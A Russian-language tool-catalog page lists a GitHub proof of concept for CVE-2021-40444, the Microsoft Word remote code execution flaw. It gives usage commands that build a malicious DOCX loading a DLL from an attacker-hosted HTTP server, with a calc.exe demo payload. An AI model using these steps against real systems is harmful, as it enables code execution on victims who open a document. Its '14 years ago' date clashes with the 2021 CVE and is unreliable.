Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx — Генерирует вредоносные DOCX-документы, эксплуатирующие CVE-2021-40444 (удаленное выполнение кода в Microsoft Office Word) со встроенным HTTP-сервером для размещения полезной нагрузки. | Kitploit
Инструменты/GitHubGitHub/w1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийАнализ вредоносных программКомандование и Управление
GitHubw1kyri3/exploit-poc-cve-2021-40444-inject-ma-doc-vao-docx

Exploit-PoC-CVE-2021-40444-inject-ma-doc-vao-docx

Генерирует вредоносные DOCX-документы, эксплуатирующие CVE-2021-40444 (удаленное выполнение кода в Microsoft Office Word) со встроенным HTTP-сервером для размещения полезной нагрузки.

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться
Репозиторий
14 лет назадЕщё не проверено

CVE-2021-40444 PoC

Генератор вредоносных docx для эксплуатации CVE-2021-40444 (удаленное выполнение кода в Microsoft Office Word)

Создание этого скрипта основано на обратной разработке семпла, использовавшегося в реальных атаках: 938545f7bbe40738908a95da8cdeabb2a11ce2ca36b0f6a74deda9378d380a52 (файл docx)

Сначала необходимо установить lcab (sudo apt-get install lcab)

Ознакомьтесь с REPRODUCE.md для ручного воспроизведения шагов

Если сгенерированный cab не работает, попробуйте указать URL exploit.html на calc.cab

Использование

Сначала сгенерируйте вредоносный docx-документ, указав DLL. Можно использовать файл из test/calc.dll, который просто запускает calc.exe через вызов system()

python3 exploit.py generate test/calc.dll http://<SRV IP>

Генерация документа

После генерации вредоносного docx (будет в out/) можно настроить сервер:

sudo python3 exploit.py host 80

Сервер

Наконец, откройте docx на виртуальной машине Windows:

Запуск calc

Скачать инструмент